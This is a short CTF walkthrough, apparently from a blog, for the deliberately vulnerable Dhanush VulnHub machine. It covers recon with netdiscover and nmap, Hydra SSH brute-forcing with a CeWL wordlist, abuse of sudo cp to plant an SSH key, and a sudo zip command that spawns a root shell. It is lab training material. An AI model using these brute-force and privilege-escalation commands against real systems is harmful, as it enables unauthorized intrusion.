Dhanush VulnHub CTF Walkthrough

3 min read CTF Walkthroughs VULNHUB
Dhanush VulnHub CTF Walkthrough

This walkthrough covers the steps taken to complete the Dhanush virtual machine from VulnHub, from reconnaissance to gaining root access.

Step 1: Identify the Target Host

We first identified the IP address of the target machine on our network using Netdiscover. The scan showed three hosts, and 192.168.187.155 was identified as the target.

Step 2: Port Scanning with Nmap

We performed a full port scan with service and script detection. Nmap revealed two open ports: 80/tcp running Apache 2.4.29 (Ubuntu) and 65345/tcp running OpenSSH 7.6p1. The web server title was “HA: Dhanush,” and the target is a Linux system on VMware.

Step 3: Web Enumeration

We checked robots.txt using a curl request, but it returned 404 Not Found. Nikto was run against the web server, finding missing security headers and directory indexing at /images/, but no exploitable vulnerabilities. Directory brute-forcing with Gobuster, Dirb, or Dirsearch yielded no interesting results.

curl http://192.168.187.155/robots.txt

Step 4: Password Brute-Forcing via SSH

Since the web services provided no direct exploit, we focused on SSH. A custom wordlist was generated from the website using CeWL, containing 114 words. Using Hydra with this wordlist, we successfully brute-forced the SSH credentials: username pinak and password Gandiv.

cewl -d 3 http://192.168.187.155 -w dict.txt
wc -l dict.txt  # 114 words

hydra -L dict.txt -P dict.txt ssh://192.168.187.155 -s 65345

Step 5: Initial Shell Access

We logged in as pinak via SSH on port 65345. This provided a user shell on the target machine.

ssh pinak@192.168.187.155 -p 65345

Step 6: Privilege Escalation

We checked sudo privileges with sudo -l. The output showed that user pinak could run /bin/cp as user sarang without a password. We exploited this by copying pinak's id_rsa.pub to sarang's authorized_keys, then SSHing into sarang’s account.

User pinak may run the following commands on ubuntu:
    (sarang) NOPASSWD: /bin/cp

sudo -u sarang /bin/cp id_rsa.pub /home/sarang/.ssh/authorized_keys
ssh sarang@127.0.0.1 -p 65345

For root escalation, we checked sarang's sudo privileges and found that sarang could run /usr/bin/zip as root without a password. Using zip with a shell payload, we obtained a root shell.

User sarang may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/zip

cd /tmp
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'

Step 7: Capture the Flag

Navigating to /root, we found flag.txt and read its contents, successfully capturing the root flag.

@p
@@@.
@@@@@
@@@@@@@
...

Summary

  1. Reconnaissance with Netdiscover identified the target.

  2. Nmap scanning revealed HTTP and SSH services.

  3. Web enumeration provided no direct exploits.

  4. SSH credentials were obtained via brute-force using a custom wordlist.

  5. Privilege escalation was performed first to user sarang via sudo /bin/cp, then to root via sudo /usr/bin/zip.

  6. Root shell was obtained and the flag captured.

Written by

jason

Views: 0 Updated: Aug 25, 2025

Related Articles

HackTheBox Lame CTF Walkthrough

4 min read
Read Article
MinU v2 VulnHub Walkthrough: Full CTF Guide

9 min read
Read Article
Symfonos 4 Vulnhub Walkthrough

14 min read
Read Article

Comments

Leave a Comment

No comments yet. Be the first to comment!